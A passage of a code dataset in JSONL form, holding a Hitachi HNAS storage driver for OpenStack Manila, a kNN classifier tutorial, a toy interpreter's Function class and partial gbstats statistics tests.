supported.\n :returns: Returns a path of /shares/share_id if the export is ok.\n \"\"\"\n path = '/shares/' + share_id\n\n if not self._check_fs_mounted(self.fs_name):\n self._mount(self.fs_name)\n LOG.debug(\"Filesystem %(fs)s is unmounted. Mounting...\",\n {'fs': self.fs_name})\n self._check_vvol(share_id)\n self._check_quota(share_id)\n self._check_export(share_id)\n return path\n\n def create_share(self, share_id, share_size, share_proto):\n \"\"\"Creates share.\n\n Creates a virtual-volume, adds a quota limit and exports it.\n :param share_id: ID of share that will be created.\n :param share_size: Size limit of share.\n :param share_proto: Storage protocol of share. Currently,\n only NFS storage protocol is supported.\n :returns: Returns a path of /shares/share_id if the export was\n created successfully.\n \"\"\"\n path = '/shares/' + share_id\n self._vvol_create(share_id, share_size)\n LOG.debug(\"Share created with id %(shr)s, size %(size)sG.\",\n {'shr': share_id, 'size': share_size})\n try:\n # Create NFS export\n self._nfs_export_add(share_id)\n LOG.debug(\"NFS Export created to %(shr)s.\",\n {'shr': share_id})\n return path\n except processutils.ProcessExecutionError as e:\n self._vvol_delete(share_id)\n msg = six.text_type(e)\n LOG.exception(msg)\n raise e\n\n def extend_share(self, share_id, share_size, share_proto):\n \"\"\"Extends a share to new size.\n\n :param share_id: ID of share that will be extended.\n :param share_size: New size of share.\n :param share_proto: Storage protocol of share. Currently,\n only NFS storage protocol is supported.\n \"\"\"\n self.ensure_share(share_id, share_proto)\n\n total, available_space = self.get_stats()\n\n LOG.debug(\"Available space in filesystem: %(space)s.\",\n {'space': available_space})\n\n if share_size < available_space:\n self._extend_quota(share_id, share_size)\n else:\n msg = (_(\"Failed to extend share %s.\") % share_id)\n raise exception.HNASBackendException(msg=msg)\n\n def manage_existing(self, share_proto, share_id):\n \"\"\"Manages a share that exists on backend.\n\n :param share_proto: Storage protocol of share. Currently,\n only NFS storage protocol is supported.\n :param share_id: ID of share that will be managed.\n :returns: Returns a dict with size of share managed\n and its location (your path in file-system).\n \"\"\"\n self.ensure_share(share_id, share_proto)\n\n share_size = self._get_share_quota(share_id)\n if share_size is None:\n msg = (_(\"The share %s trying to be managed does not have a \"\n \"quota limit, please set it before manage.\") % share_id)\n raise exception.HNASBackendException(msg=msg)\n\n path = six.text_type(self.evs_ip) + ':/shares/' + share_id\n\n return {'size': share_size, 'export_locations': [path]}\n\n def create_snapshot(self, share_id, snapshot_id):\n \"\"\"Creates a snapshot of share.\n\n It copies the directory and all files to a new directory inside\n /snapshots/share_id/.\n :param share_id: ID of share for snapshot.\n :param snapshot_id: ID of new snapshot.\n \"\"\"\n\n export = self._nfs_export_list(share_id)\n saved_list = export[0].export_configuration\n new_list = []\n for access in saved_list:\n new_list.append(access.replace('(rw)', '(ro)'))\n self._update_access_rule(share_id, new_list)\n\n src_path = '/shares/' + share_id\n snap_path = '/snapshots/' + share_id + '/' + snapshot_id\n\n try:\n command = ['tree-clone-job-submit', '-e', '-f', self.fs_name,\n src_path, snap_path]\n\n output, err = self._execute(command)\n job_submit = JobSubmit(output)\n if job_submit.request_status == 'Request submitted successfully':\n job_id = job_submit.job_id\n\n job_status = None\n progress = ''\n job_rechecks = 0\n starttime = time.time()\n deadline = starttime + self.job_timeout\n while not job_status or \\\n job_status.job_state != \"Job was completed\":\n\n command = ['tree-clone-job-status', job_id]\n output, err = self._execute(command)\n job_status = JobStatus(output)\n\n if job_status.job_state == 'Job failed':\n break\n\n old_progress = progress\n progress = job_status.data_bytes_processed\n\n if old_progress == progress:\n job_rechecks += 1\n now = time.time()\n if now > deadline:\n command = ['tree-clone-job-abort', job_id]\n output, err = self._execute(command)\n LOG.error(_LE(\"Timeout in snapshot %s creation.\") %\n snapshot_id)\n msg = (_(\"Share snapshot %s was not created.\")\n % snapshot_id)\n raise exception.HNASBackendException(msg=msg)\n else:\n time.sleep(job_rechecks ** 2)\n else:\n job_rechecks = 0\n\n if (job_status.job_state, job_status.job_status,\n job_status.directories_missing,\n job_status.files_missing) == (\"Job was completed\",\n \"Success\", '0', '0'):\n\n LOG.debug(\"Snapshot %(snapshot_id)s from share \"\n \"%(share_id)s created successfully.\",\n {'snapshot_id': snapshot_id,\n 'share_id': share_id})\n else:\n LOG.error(_LE('Error in snapshot %s creation.'),\n snapshot_id)\n msg = (_('Share snapshot %s was not created.') %\n snapshot_id)\n raise exception.HNASBackendException(msg=msg)\n\n except processutils.ProcessExecutionError as e:\n if ('Cannot find any clonable files in the source directory' in\n e.stderr):\n\n LOG.warning(_LW(\"Source directory is empty, creating an empty \"\n \"snapshot.\"))\n self._locked_selectfs('create', snap_path)\n else:\n msg = six.text_type(e)\n LOG.exception(msg)\n raise exception.HNASBackendException(msg=msg)\n finally:\n self._update_access_rule(share_id, saved_list)\n\n def delete_snapshot(self, share_id, snapshot_id):\n \"\"\"Deletes snapshot.\n\n It receives the share_id only to mount the path for snapshot.\n :param share_id: ID of share that snapshot was created.\n :param snapshot_id: ID of snapshot.\n \"\"\"\n path = '/snapshots/' + share_id + '/' + snapshot_id\n command = ['tree-delete-job-submit', '--confirm', '-f', self.fs_name,\n path]\n try:\n output, err = self._execute(command)\n path = '/snapshots/' + share_id\n if 'Request submitted successfully' in output:\n self._locked_selectfs('delete', path)\n\n except processutils.ProcessExecutionError as e:\n if 'Source path: Cannot access' not in e.stderr:\n msg = six.text_type(e)\n LOG.exception(msg)\n raise e\n\n def create_share_from_snapshot(self, share, snapshot):\n \"\"\"Creates a new share from snapshot.\n\n It copies everything from snapshot directory to a new vvol,\n set a quota limit for it and export.\n :param share: a dict from new share.\n :param snapshot: a dict from snapshot that will be copied to\n new share.\n :returns: Returns the path for new share.\n \"\"\"\n output = ''\n dst_path = '/shares/' + share['id']\n src_path = '/snapshots/' + snapshot['share_id'] + '/' + snapshot['id']\n\n # Before copying everything to new vvol, we need to create it,\n # because we only can transform an empty directory into a vvol.\n\n self._vvol_create(share['id'], share['size'])\n\n try:\n # Copy the directory to new vvol\n # Syntax: tree-clone-job-submit \n LOG.debug(\"Started share create from: %(shr)s.\",\n {'shr': six.text_type(snapshot['share_id'])})\n command = ['tree-clone-job-submit', '-f', self.fs_name,\n src_path, dst_path]\n output, err = self._execute(command)\n except processutils.ProcessExecutionError as e:\n if ('Cannot find any clonable files in the source directory' in\n e.stderr):\n LOG.warning(_LW(\"Source directory is empty, exporting \"\n \"directory.\"))\n if self._nfs_export_add(share['id']):\n return dst_path\n\n if 'Request submitted successfully' in output:\n # Create NFS export\n if self._nfs_export_add(share['id']):\n # Return export path\n return dst_path\n else:\n msg = (_(\"Share %s was not created.\") % share['id'])\n raise exception.HNASBackendException(msg=msg)\n\n @mutils.retry(exception=exception.HNASConnException, wait_random=True)\n def _execute(self, commands):\n command = ['ssc', '127.0.0.1']\n if self.admin_ip0 is not None:\n command = ['ssc', '--smuauth', self.admin_ip0]\n\n command = command + ['console-context', '--evs', self.evs_id]\n commands = command + commands\n\n mutils.check_ssh_injection(commands)\n commands = ' '.join(commands)\n\n if not self.sshpool:\n self.sshpool = mutils.SSHPool(ip=self.ip,\n port=self.port,\n conn_timeout=None,\n login=self.user,\n password=self.password,\n privatekey=self.priv_key)\n with self.sshpool.item() as ssh:\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n try:\n out, err = processutils.ssh_execute(ssh, commands,\n check_exit_code=True)\n LOG.debug(\"Command %(cmd)s result: out = %(out)s - err = \"\n \"%(err)s.\", {'cmd': commands,\n 'out': out, 'err': err})\n return out, err\n except processutils.ProcessExecutionError as e:\n if 'Failed to establish SSC connection' in e.stderr:\n LOG.debug(\"SSC connection error!\")\n msg = _(\"Failed to establish SSC connection.\")\n raise exception.HNASConnException(msg=msg)\n else:\n LOG.debug(\"Command %(cmd)s result: out = %(out)s - err = \"\n \"%(err)s - exit = %(exit)s.\", {'cmd': e.cmd,\n 'out': e.stdout,\n 'err': e.stderr,\n 'exit':\n e.exit_code})\n LOG.error(_LE(\"Error running SSH command.\"))\n raise\n\n def _check_fs_mounted(self, fs_name):\n self._check_fs()\n fs_list = self._get_filesystem_list()\n for i in range(0, len(fs_list)):\n if fs_list[i].name == fs_name and fs_list[i].state == 'Mount':\n return True\n return False\n\n def _get_filesystem_list(self):\n command = ['filesystem-list']\n output, err = self._execute(command)\n items = output.split('\\n')\n filesystem_list = []\n fs_name = None\n if len(items) > 2:\n j = 0\n for i in range(2, len(items) - 1):\n if \"Filesystem \" in items[i] and len(items[i].split()) == 2:\n description, fs_name = items[i].split()\n fs_name = fs_name[:len(fs_name) - 1]\n elif \"NoEVS\" not in items[i]:\n # Not considering FS without EVS\n filesystem_list.append(FileSystem(items[i]))\n if fs_name is not None:\n filesystem_list[j].name = fs_name\n fs_name = None\n j += 1\n else:\n LOG.debug(\"Ignoring filesystems without EVS.\")\n\n return filesystem_list\n\n def _nfs_export_add(self, share_id):\n path = '/shares/' + share_id\n # nfs-export add -S disable -c \n command = ['nfs-export', 'add', '-S', 'disable', '-c', '127.0.0.1',\n path, self.fs_name, path]\n output, err = self._execute(command)\n return True\n\n def _nfs_export_del(self, share_id):\n path = '/shares/' + share_id\n command = ['nfs-export', 'del', path]\n\n try:\n output, err = self._execute(command)\n except exception.HNASBackendException as e:\n LOG.warning(_LW(\"Export %s does not exist on backend anymore.\"),\n path)\n LOG.exception(six.text_type(e))\n\n def _update_access_rule(self, share_id, host_list):\n # mount the command line\n command = ['nfs-export', 'mod', '-c']\n\n if len(host_list) == 0:\n command.append('127.0.0.1')\n else:\n string_command = '\"' + six.text_type(host_list[0])\n\n for i in range(1, len(host_list)):\n string_command += ',' + (six.text_type(host_list[i]))\n string_command += '\"'\n command.append(string_command)\n\n path = '/shares/' + share_id\n command.append(path)\n output, err = self._execute(command)\n\n if (\"Export modified successfully\" in output or\n \"Export modified successfully\" in err):\n return True\n else:\n return False\n\n def _nfs_export_list(self, share_id=''):\n if share_id is not '':\n share_id = '/shares/' + share_id\n command = ['nfs-export', 'list ', six.text_type(share_id)]\n output, err = self._execute(command)\n nfs_export_list = []\n\n if 'No exports are currently configured' not in output:\n items = output.split('Export name')\n\n if items[0][0] == '\\n':\n items.pop(0)\n\n for i in range(0, len(items)):\n nfs_export_list.append(Export(items[i]))\n\n return nfs_export_list\n\n def _mount(self, fs):\n command = ['mount', fs]\n try:\n output, err = self._execute(command)\n if 'successfully mounted' in output:\n return True\n except processutils.ProcessExecutionError as e:\n if 'file system is already mounted' in e.stderr:\n return True\n else:\n msg = six.text_type(e)\n LOG.exception(msg)\n raise e\n\n def _vvol_create(self, vvol_name, vvol_quota):\n # create a virtual-volume inside directory\n if self._check_fs():\n path = '/shares/' + vvol_name\n command = ['virtual-volume', 'add', '--ensure', self.fs_name,\n vvol_name, path]\n output, err = self._execute(command)\n\n # put a quota limit in virtual-volume to deny expand abuses\n self._quota_add(vvol_name, vvol_quota)\n return True\n else:\n msg = (_(\"Filesystem %s does not exist or it is not available \"\n \"in the current EVS context.\") % self.fs_name)\n raise exception.HNASBackendException(msg=msg)\n\n def _quota_add(self, vvol_name, vvol_quota):\n if vvol_quota > 0:\n str_quota = six.text_type(vvol_quota) + 'G'\n command = ['quota', 'add', '--usage-limit',\n str_quota, '--usage-hard-limit',\n 'yes', self.fs_name, vvol_name]\n output, err = self._execute(command)\n return True\n return False\n\n def _vvol_delete(self, vvol_name):\n path = '/shares/' + vvol_name\n # Virtual-volume and quota are deleted together\n command = ['tree-delete-job-submit', '--confirm', '-f',\n self.fs_name, path]\n try:\n output, err = self._execute(command)\n return True\n except processutils.ProcessExecutionError as e:\n if 'Source path: Cannot access' in e.stderr:\n LOG.debug(\"Share %(shr)s does not exist.\",\n {'shr': six.text_type(vvol_name)})\n else:\n msg = six.text_type(e)\n LOG.exception(msg)\n raise e\n\n def _extend_quota(self, vvol_name, new_size):\n str_quota = six.text_type(new_size) + 'G'\n command = ['quota', 'mod', '--usage-limit', str_quota,\n self.fs_name, vvol_name]\n output, err = self._execute(command)\n return True\n\n def _check_fs(self):\n fs_list = self._get_filesystem_list()\n fs_name_list = []\n for i in range(0, len(fs_list)):\n fs_name_list.append(fs_list[i].name)\n if fs_list[i].name == self.fs_name:\n return True\n return False\n\n def _check_vvol(self, vvol_name):\n command = ['virtual-volume', 'list', '--verbose', self.fs_name,\n vvol_name]\n try:\n output, err = self._execute(command)\n return True\n except processutils.ProcessExecutionError as e:\n msg = six.text_type(e)\n LOG.exception(msg)\n msg = (_(\"Virtual volume %s does not exist.\") % vvol_name)\n raise exception.HNASBackendException(msg=msg)\n\n def _check_quota(self, vvol_name):\n command = ['quota', 'list', '--verbose', self.fs_name, vvol_name]\n output, err = self._execute(command)\n\n if 'No quotas matching specified filter criteria' not in output:\n return True\n else:\n msg = (_(\"Virtual volume %s does not have any quota.\") % vvol_name)\n raise exception.HNASBackendException(msg=msg)\n\n def _check_export(self, vvol_name):\n export = self._nfs_export_list(vvol_name)\n if (vvol_name in export[0].export_name and\n self.fs_name in export[0].file_system_label):\n return True\n else:\n msg = (_(\"Export %s does not exist.\") % export[0].export_name)\n raise exception.HNASBackendException(msg=msg)\n\n def _get_share_quota(self, share_id):\n command = ['quota', 'list', self.fs_name, six.text_type(share_id)]\n output, err = self._execute(command)\n items = output.split('\\n')\n\n for i in range(0, len(items) - 1):\n if ('Unset' not in items[i] and\n 'No quotas matching' not in items[i]):\n if 'Limit' in items[i] and 'Hard' in items[i]:\n quota = float(items[i].split(' ')[12])\n size_unit = items[i].split(' ')[13]\n if size_unit in ('TB', 'GB'):\n # If the quota is 1 or more TB, converts to GB\n if size_unit == 'TB':\n return quota * units.Ki\n return quota\n else:\n msg = (_(\"Share %s does not support quota values \"\n \"below 1GB.\") % share_id)\n raise exception.HNASBackendException(msg=msg)\n else:\n # Returns None if the quota is unset\n return None\n\n @mutils.synchronized(\"hds_hnas_select_fs\", external=True)\n def _locked_selectfs(self, op, path):\n if op == 'create':\n command = ['selectfs', self.fs_name, '\\n',\n 'ssc', '127.0.0.1', 'console-context', '--evs',\n self.evs_id, 'mkdir', '-p', path]\n output, err = self._execute(command)\n\n if op == 'delete':\n command = ['selectfs', self.fs_name, '\\n',\n 'ssc', '127.0.0.1', 'console-context', '--evs',\n self.evs_id, 'rmdir', path]\n try:\n output, err = self._execute(command)\n except processutils.ProcessExecutionError:\n LOG.debug(\"Share %(path)s has more snapshots.\", {'path': path})\n\n\nclass FileSystem(object):\n def __init__(self, data):\n if data:\n items = data.split()\n if len(items) >= 7:\n self.name = items[0]\n self.dev = items[1]\n self.on_span = items[2]\n self.state = items[3]\n self.evs = int(items[4])\n self.capacity = int(items[5])\n self.confined = int(items[6])\n if len(items) == 8:\n self.flag = items[7]\n else:\n self.flag = ''\n\n\nclass Export(object):\n def __init__(self, data):\n if data:\n split_data = data.split('Export configuration:\\n')\n items = split_data[0].split('\\n')\n\n self.export_name = items[0].split(':')[1].strip()\n self.export_path = items[1].split(':')[1].strip()\n\n if '*** not available ***' in items[2]:\n self.file_system_info = items[2].split(':')[1].strip()\n index = 0\n\n else:\n self.file_system_label = items[2].split(':')[1].strip()\n self.file_system_size = items[3].split(':')[1].strip()\n self.file_system_free_space = items[4].split(':')[1].strip()\n self.file_system_state = items[5].split(':')[1]\n self.formatted = items[6].split('=')[1].strip()\n self.mounted = items[7].split('=')[1].strip()\n self.failed = items[8].split('=')[1].strip()\n self.thin_provisioned = items[9].split('=')[1].strip()\n index = 7\n\n self.access_snapshots = items[3 + index].split(':')[1].strip()\n self.display_snapshots = items[4 + index].split(':')[1].strip()\n self.read_caching = items[5 + index].split(':')[1].strip()\n self.disaster_recovery_setting = items[6 + index].split(':')[1]\n self.recovered = items[7 + index].split('=')[1].strip()\n self.transfer_setting = items[8 + index].split('=')[1].strip()\n\n self.export_configuration = []\n export_config = split_data[1].split('\\n')\n for i in range(0, len(export_config)):\n if any(j.isdigit() or j.isalpha() for j in export_config[i]):\n self.export_configuration.append(export_config[i])\n\n\nclass JobStatus(object):\n def __init__(self, data):\n if data:\n lines = data.split(\"\\n\")\n\n self.job_id = lines[0].split()[3]\n self.physical_node = lines[2].split()[3]\n self.evs = lines[3].split()[2]\n self.volume_number = lines[4].split()[3]\n self.fs_id = lines[5].split()[4]\n self.fs_name = lines[6].split()[4]\n self.source_path = lines[7].split()[3]\n self.creation_time = \" \".join(lines[8].split()[3:5])\n self.destination_path = lines[9].split()[3]\n self.ensure_path_exists = lines[10].split()[5]\n self.job_state = \" \".join(lines[12].split()[3:])\n self.job_started = \" \".join(lines[14].split()[2:4])\n self.job_ended = \" \".join(lines[15].split()[2:4])\n self.job_status = lines[16].split()[2]\n\n error_details_line = lines[17].split()\n if len(error_details_line) > 3:\n self.error_details = \" \".join(error_details_line[3:])\n else:\n self.error_details = None\n\n self.directories_processed = lines[18].split()[3]\n self.files_processed = lines[19].split()[3]\n self.data_bytes_processed = lines[20].split()[4]\n self.directories_missing = lines[21].split()[4]\n self.files_missing = lines[22].split()[4]\n self.files_skipped = lines[23].split()[4]\n\n skipping_details_line = lines[24].split()\n if len(skipping_details_line) > 3:\n self.skipping_details = \" \".join(skipping_details_line[3:])\n else:\n self.skipping_details = None\n\n\nclass JobSubmit(object):\n def __init__(self, data):\n if data:\n split_data = data.replace(\".\", \"\").split()\n\n self.request_status = \" \".join(split_data[1:4])\n self.job_id = split_data[8]\n\n\nclass Capacity(object):\n def __init__(self, data):\n if data:\n items = data.split()\n self.id = items[0]\n self.label = items[1]\n self.evs = items[2]\n self.size = float(items[3])\n self.size_measure = items[4]\n if self.size_measure == 'TB':\n self.size = self.size * units.Ki\n self.used = float(items[5])\n self.used_measure = items[6]\n if self.used_measure == 'TB':\n self.used = self.used * units.Ki\n","repo_name":"suhaibchishti/sample_scripts","sub_path":"manila/share/drivers/hitachi/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":31966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25919575975","text":"from numpy import *\r\nimport operator\r\nfrom os import listdir\r\n\r\ndef createDataSet():\r\n group = array([[1.0,1.1],[1.0,1.0],[0,0],[0,0.1]])\r\n labels = ['A','A','B','B']\r\n return group, labels\r\n\r\ndef classify0(inX, dataSet, labels, k):\r\n#调用该文件时,如果本身的数据和分类结果在同一个文件中,需要分为两部分分别赋给dataset和labels\r\n dataSetSize = dataSet.shape[0]\r\n #print(dataSetSize)#4\r\n #print(tile(inX,(dataSetSize,1)))##[[0,0],[0,0],[0,0],[0,0]]\r\n diffMat = tile(inX, (dataSetSize,1)) - dataSet\r\n #print(diffMat)\r\n sqDiffMat = diffMat**2\r\n #print(sqDiffMat)\r\n sqDistances = sqDiffMat.sum(axis=1)\r\n #print(sqDistances)\r\n distances = sqDistances**0.5\r\n #print(distances)#[1.48,1.41,0,0.1]\r\n sortedDistIndicies = distances.argsort() \r\n #print(sortedDistIndicies)#[2,3,1,0]\r\n classCount={} \r\n for i in range(k):\r\n voteIlabel = labels[sortedDistIndicies[i]]\r\n #print(voteIlabel)\r\n classCount[voteIlabel] = classCount.get(voteIlabel,0) + 1\r\n #print(classCount)#这个不是返回距离最近的数,而是取跟它最接近的前k个数,然后分别统计结果\r\n sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1), reverse=True)\r\n #这里把前k个数按照分类个数的多少排序,即分为‘1’类的如果最多,则在前面\r\n #print(sortedClassCount[0])\r\n return sortedClassCount[0][0]\r\n\r\ndef file2matrix(filename):\r\n fr = open(filename)\r\n www=fr.readlines()\r\n numberOfLines = len(www) #get the number of lines in the file\r\n returnMat = zeros((numberOfLines,3)) #prepare matrix to return\r\n classLabelVector = [] #prepare labels return \r\n #fr = open(filename)###如果省略www行,则需要添加这一行,参照源代码。but why?\r\n index = 0\r\n for line in www:\r\n line = line.strip()\r\n listFromLine = line.split('\\t')\r\n #print(listFromLine)\r\n returnMat[index,:] = listFromLine[0:3]\r\n '''\r\n if listFromLine[-1]=='largeDoses':classLabelVector.append(3)\r\n else:\r\n if listFromLine[-1]=='smallDoses':classLabelVector.append(2)\r\n else:classLabelVector.append(1)'''\r\n classLabelVector.append(listFromLine[-1])#调用set文件时用这行不行,用上三行。望天。调用set2文件时用该行。\r\n index += 1\r\n return returnMat,classLabelVector\r\n\r\ndef autoNorm(dataSet):\r\n minVals = dataSet.min(0)\r\n #print(minVals)\r\n maxVals = dataSet.max(0)\r\n #print(maxVals)\r\n ranges = maxVals - minVals\r\n normDataSet = zeros(shape(dataSet))\r\n m = dataSet.shape[0]#行数。\r\n #print(m)#1000\r\n #print(len(dataSet))#1000\r\n #print(dataSet[1])\r\n normDataSet = dataSet - tile(minVals, (m,1))\r\n normDataSet = normDataSet/tile(ranges, (m,1)) #element wise divide\r\n return normDataSet, ranges, minVals\r\n \r\ndef datingClassTest():\r\n hoRatio = 0.013 #hold out 10%\r\n datingDataMat,datingLabels = file2matrix('datingTestSet2.txt') #load data setfrom file\r\n print(datingLabels[:20])\r\n normMat, ranges, minVals = autoNorm(datingDataMat)\r\n m = normMat.shape[0]\r\n numTestVecs = int(m*hoRatio)##测试综述\r\n errorCount = 0.0\r\n for i in range(numTestVecs):#其实是把所有数据分成两部分,一部分是test,一部分是train。\r\n classifierResult = classify0(normMat[i,:],normMat[numTestVecs:m,:],datingLabels[numTestVecs:m],8)\r\n print (\"the classifier came back with: %s, the real answer is: %s\" % (classifierResult, datingLabels[i]))\r\n ##这里如果变成数字格式需要int()\r\n if (classifierResult != datingLabels[i]): errorCount += 1.0\r\n print (\"the total error rate is: %f\" % (errorCount/float(numTestVecs)))\r\n print (errorCount)\r\n\r\ndef classifyPerson():\r\n resultList=['not','small','large']\r\n percentTats=float(input('percentage of time spent playing video games?'))\r\n ffmilise=float(input('miles per year?'))\r\n icecream=float(input('liters of ice cream per year?'))\r\n datingDataMat,datingLabels=file2matrix('datingTestSet2.txt')\r\n normMat, ranges, minVals=autoNorm(datingDataMat)\r\n inArr=array([ffmilise,percentTats,icecream])\r\n classifierResult=classify0((inArr-minVals)/ranges,normMat,datingLabels,3)\r\n print('you will like the one:', resultList[int(classifierResult)-1])\r\n\r\ndef img2vector(filename):#返回单行的数字\r\n returnVect = zeros((1,1024))\r\n fr = open(filename)\r\n for i in range(32):#32行\r\n lineStr = fr.readline()\r\n for j in range(32):\r\n returnVect[0,32*i+j] = int(lineStr[j])\r\n return returnVect\r\n \r\ndef handwritingClassTest():\r\n hwLabels = []\r\n trainingFileList = listdir('trainingDigits') #load the training set\r\n m = len(trainingFileList)\r\n #print(m)#1934\r\n trainingMat = zeros((m,1024))\r\n for i in range(m):\r\n \r\n fileNameStr = trainingFileList[i]\r\n #print(fileNameStr)\r\n fileStr = fileNameStr.split('.')[0] #take off .txt\r\n classNumStr = int(fileStr.split('_')[0])##前面的识别数字。\r\n #print(classNumStr)\r\n hwLabels.append(classNumStr)\r\n #print(hwLabels)#所有识别数字的顺序\r\n trainingMat[i,:] = img2vector('trainingDigits/%s' % fileNameStr)#所有的单行数字为一个文件的总体\r\n #print(trainingMat)\r\n testFileList = listdir('testDigits') #iterate through the test set\r\n errorCount = 0.0\r\n mTest = len(testFileList)\r\n \r\n for i in range(mTest):\r\n fileNameStr = testFileList[i]\r\n fileStr = fileNameStr.split('.')[0] #take off .txt\r\n classNumStr = int(fileStr.split('_')[0])\r\n vectorUnderTest = img2vector('testDigits/%s' % fileNameStr)#得到每一个测试文件的单行文字\r\n classifierResult = classify0(vectorUnderTest, trainingMat, hwLabels, 5)\r\n #它之前没有把得到的每个单行文字和识别的数字建立联系,但是它安装同样的顺序放置,所以依旧可以据此进行判别。\r\n #print (\"the classifier came back with: %d, the real answer is: %d\" % (classifierResult, classNumStr))\r\n if (classifierResult != classNumStr): errorCount += 1.0\r\n print (\"\\nthe total number of errors is: %d\" % errorCount)\r\n print (\"\\nthe total error rate is: %f\" % (errorCount/float(mTest)))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"sevenry/python_learning_note","sub_path":"machine_learning/ss2/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"20851874286","text":"class Function(object):\n \"\"\"\n Create a realistic function object, defining the things the interpreter expects.\n \"\"\"\n __slots__ = [\n 'func_code', 'func_name', 'func_defaults', 'func_globals',\n 'func_locals', 'func_dict', 'func_closure',\n '__name__', '__dict__', '__doc__',\n '_vm', '_func',\n ]\n\n def __init__(self, name, code, globs, defaults, closure, vm):\n \"\"\"You don't need to follow this closely to understand the interpreter.\"\"\"\n self._vm = vm\n self.func_code = code\n self.func_name = self.__name__ = name or code.co_name\n self.func_defaults = tuple(defaults)\n self.func_globals = globs\n self.func_locals = self._vm.frame.f_locals\n self.__dict__ = {}\n self.func_closure = closure\n self.__doc__ = code.co_consts[0] if code.co_consts else None\n\n # Sometimes, we need a real Python function. This is for that.\n kw = {\n 'argdefs': self.func_defaults,\n }\n if closure:\n kw['closure'] = tuple(make_cell(0) for _ in closure)\n self._func = types.FunctionType(code, globs, **kw)\n\n def __call__(self, *args, **kwargs):\n \"\"\"When calling a Function, make a new frame and run it.\"\"\"\n callargs = inspect.getcallargs(self._func, *args, **kwargs)\n # Use callargs to provide a mapping of arguments: values to pass into the new\n # frame.\n frame = self._vm.make_frame(\n self.func_code, callargs, self.func_globals, {}\n )\n return self._vm.run_frame(frame)\n\ndef make_cell(value):\n \"\"\"Create a real Python closure and grab a cell.\"\"\"\n # Thanks to Alex Gaynor for help with this bit of twistiness.\n fn = (lambda x: lambda: x)(value)\n return fn.__closure__[0]\n","repo_name":"doubledherin/my_compiler","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"42759998249","text":"import pytest\nimport numpy as np\nimport pandas as pd\nfrom gbstats.gbstats import (\n check_srm,\n get_adjusted_stats,\n process_user_rows,\n process_metric_rows,\n run_analysis,\n correctMean,\n correctStddev,\n detect_unknown_variations,\n reduce_dimensionality,\n analyze_metric_df,\n get_metric_df,\n)\nfrom functools import partial\n\nDECIMALS = 9\nround_ = partial(np.round, decimals=DECIMALS)\n\n\ndef test_srm():\n p = check_srm([1000, 1200], [0.5, 0.5])\n assert round_(p) == 0.000020079\n\n\ndef test_correct_stddev():\n s = correctStddev(100, 10, 5, 150, 15, 3)\n assert round_(s) == 4.620540833\n s = correctStddev(0, 0, 0, 1, 15, 0)\n assert s == 0\n\n\ndef test_correct_mean():\n m = correctMean(100, 10, 150, 15)\n assert m == 13\n m = correctMean(0, 0, 1, 15)\n assert m == 15\n\n\ndef test_unknown_variations():\n rows = pd.DataFrame(\n [\n {\n \"dimension\": \"All\",\n \"variation\": \"one\",\n \"count\": 120,\n \"mean\": 2.5,\n \"stddev\": 1,\n \"users\": 1000,\n },\n {\n \"dimension\": \"All\",\n \"variation\": \"zero\",\n \"count\": 100,\n \"mean\": 2.7,\n \"stddev\": 1.1,\n \"users\": 1100,\n },\n ]\n )\n assert detect_unknown_variations(rows, {\"zero\": 0, \"one\": 1}) == set()\n assert detect_unknown_variations(rows, {\"zero\": 0, \"hello\": 1}) == {\"one\"}\n assert detect_unknown_variations(rows, {\"hello\": 0, \"world\": 1}) == {\"one\", \"zero\"}\n\n\ndef test_multiple_exposures():\n rows = pd.DataFrame(\n [\n {\n \"dimension\": \"All\",\n \"variation\": \"one\",\n \"count\": 120,\n \"mean\": 2.5,\n \"stddev\": 1,\n \"users\": 1000,\n },\n {\n \"dimension\": \"All\",\n \"variation\": \"two\",\n \"count\": 100,\n \"mean\": 2.7,\n \"stddev\": 1.1,\n \"users\": 1100,\n },\n {\n \"dimension\": \"All\",\n \"variation\": \"__multiple__\",\n \"count\": 50,\n \"mean\": 2.7,\n \"stddev\": 1.1,\n \"users\": 500,\n },\n ]\n )\n assert detect_unknown_variations(rows, {\"one\": 0, \"two\": 1}) == set()\n assert detect_unknown_variations(rows, {\"one\": 0, \"two\": 1}, {\"some_other\"}) == {\n \"__multiple__\"\n }\n\n\ndef test_reduce_dimensionality():\n rows = pd.DataFrame(\n [\n {\n \"dimension\": \"one\",\n \"variation\": \"one\",\n \"count\": 120,\n \"mean\": 2.5,\n \"stddev\": 1,\n \"users\": 1000,\n },\n {\n \"dimension\": \"one\",\n \"variation\": \"zero\",\n \"count\": 100,\n \"mean\": 2.7,\n \"stddev\": 1.1,\n \"users\": 1100,\n },\n {\n \"dimension\": \"two\",\n \"variation\": \"one\",\n \"count\": 220,\n \"mean\": 3.5,\n \"stddev\": 2,\n \"users\": 2000,\n },\n {\n \"dimension\": \"two\",\n \"variation\": \"zero\",\n \"count\": 200,\n \"mean\": 3.7,\n \"stddev\": 2.1,\n \"users\": 2100,\n },\n {\n \"dimension\": \"three\",\n \"variation\": \"one\",\n \"count\": 320,\n \"mean\": 4.5,\n \"stddev\": 3,\n \"users\": 3000,\n },\n {\n \"dimension\": \"three\",\n \"variation\": \"zero\",\n \"count\": 300,\n \"mean\": 4.7,\n \"stddev\": 3.1,\n \"users\": 3100,\n },\n ]\n )\n df = get_metric_df(rows, {\"zero\": 0, \"one\": 1}, [\"zero\", \"one\"], True, \"revenue\")\n reduced = reduce_dimensionality(df, 3)\n print(reduced)\n assert len(reduced.index) == 3\n assert reduced.at[0, \"dimension\"] == \"three\"\n assert reduced.at[0, \"v1_mean\"] == 4.5\n assert reduced.at[0, \"v1_stddev\"] == 3.0\n assert reduced.at[0, \"v1_total\"] == 1440.0\n\n reduced = reduce_dimensionality(df, 2)\n print(reduced)\n assert len(reduced.index) == 2\n assert reduced.at[1, \"dimension\"] == \"(other)\"\n assert 